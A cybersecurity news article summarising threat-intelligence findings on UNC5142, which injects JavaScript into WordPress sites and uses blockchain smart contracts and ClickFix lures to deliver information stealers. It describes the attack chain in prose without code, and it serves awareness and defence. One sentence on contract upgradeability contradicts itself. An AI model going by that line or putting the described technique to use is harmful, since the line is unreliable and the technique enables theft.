Infected WordPress Sites Spreading Malware, while Hackers Exploit Blockchain Smart Contracts
“Now infected WordPress sites are becoming the medium to spread malware for hackers.”
Targeting both Windows and Apple macOS computers, a financially motivated threat actor with the codename UNC5142 has been seen abusing blockchain smart contracts to help spread information thieves like Atomic (AMOS), Lumma, Rhadamanthys (also known as RADTHIEF), and Vidar.
Google Threat Intelligence Group (GTIG), The Hacker News, Report
| “The use of compromised WordPress websites and ‘EtherHiding,’ a method of obscuring malicious code or data by putting it on a public blockchain like the BNB Smart Chain, are characteristics of UNC5142.”
In order to improve operational agility, the threat actor’s campaigns have undergone significant change over the past year. In November 2024, they switched from a single-contract system to a more advanced three-smart contract system, with additional improvements noted earlier this January.
“The proxy pattern, a valid software design paradigm that developers utilize to make their contracts upgradeable, is adapted into this new architecture.”
“The configuration works as a very effective Router-Logic-Storage architecture, with a specific task assigned to each contract. Without changing the JavaScript on hijacked websites, this strategy enables quick adjustments to crucial attack components like the landing page URL or decryption key. The campaigns are therefore far more flexible and impervious to takedowns.”
“The Main infrastructure, distinguished by its early establishment and constant stream of upgrades, stands out as the fundamental campaign infrastructure.”
To support a particular spike in campaign activity, test new lures, or just increase operational resilience, “the secondary infrastructure appears as a parallel, more tactical deployment.”
“It is probable that UNC5142 has had some degree of success with their activities given the regular updates to the infection chain, the steady operational pace, the large number of compromised websites, and the variety of spread malware payloads over the previous year and a half.” |
According to Google, as of June 2025, it has identified over 14,000 web pages with JavaScript injected that had behavior linked to a UNC5142, suggesting that it was indiscriminately targeting WordPress websites that were vulnerable.
The IT company did point out that it hasn’t seen any UNC5142 activity since July 23, 2025, which could indicate a pause or a change in strategy.
In October 2023, Guardio Labs published the initial documentation of EtherHiding, which described attacks that used Binance’s Smart Chain (BSC) contracts to serve malicious code through compromised websites displaying phony browser update alerts.
A multi-stage JavaScript downloader called CLEARSHORT, which makes it possible for the virus to spread through the compromised websites, is a vital component that supports the attack chains.
In order to access the second stage, a malicious smart contract stored on the BNB Smart Chain (BSC) blockchain must connect with the first step, which is JavaScript malware that is introduced into the websites.
The initial step of malware is introduced into theme files, plugin-related files, and occasionally even the WordPress database itself.
For its part, the smart contract is in charge of retrieving a CLEARSHORT landing page from an outside server. This server then uses the ClickFix social engineering technique to trick victims into executing malicious commands on the Windows Run dialog box (or the Terminal app on Macs), which allows stealer malware to infect the system.
As of December 2024, the landing pages, which are usually housed on a Cloudflare dev page, are retrieved in an encrypted way.
The malicious command on Windows systems involves running an HTML Application (HTA) file that was downloaded from a MediaFire URL. It then launches a PowerShell script to circumvent security measures, retrieves the encrypted final payload from MediaFire or GitHub, or sometimes their own infrastructure, and launches the stealer in memory without writing the artifact to disk.
ClickFix decoys were used by attackers to trick users into running a bash command on Terminal, which fetched a shell script, in attacks against macOS in February and April of 2025.
The script then retrieves the Atomic Stealer payload from the remote server using the curl command.
According to assessments, CLEARSHORT is a variation of ClearFake, which was the focus of a thorough investigation conducted in March 2025 by the French cybersecurity firm Sekoia. A malicious JavaScript framework called ClearFake is used on hacked websites to spread malware via drive-by downloads.
It has been known to operate since July 2023, and in May 2024, the attacks began using ClickFix. Blockchain misuse has a number of benefits since the ingenious method not only integrates with authentic Web3 activity but also makes UNC5142’s operations more resistant to discovery and takedown attempts.
In order to do this, UNC5142 uses the malleable nature of a smart contract’s data. It is important to remember that once the program code is published, it cannot be changed to change the payload URL, which costs them anything from $0.25 to $1.50 in network fees.
Subsequent investigation has revealed that the threat actor uses two different smart contract infrastructures to distribute stealer malware using the CLEARSHORT downloader. While the parallel secondary infrastructure was funded on February 18, 2025, the main infrastructure is reportedly created on November 24, 2024.
About The Author
Suraj Koli is a content specialist in technical writing about cybersecurity & information security. He has written many amazing articles related to cybersecurity concepts, with the latest trends in cyber awareness and ethical hacking. Find out more about “Him.”
Read More:
About Author
English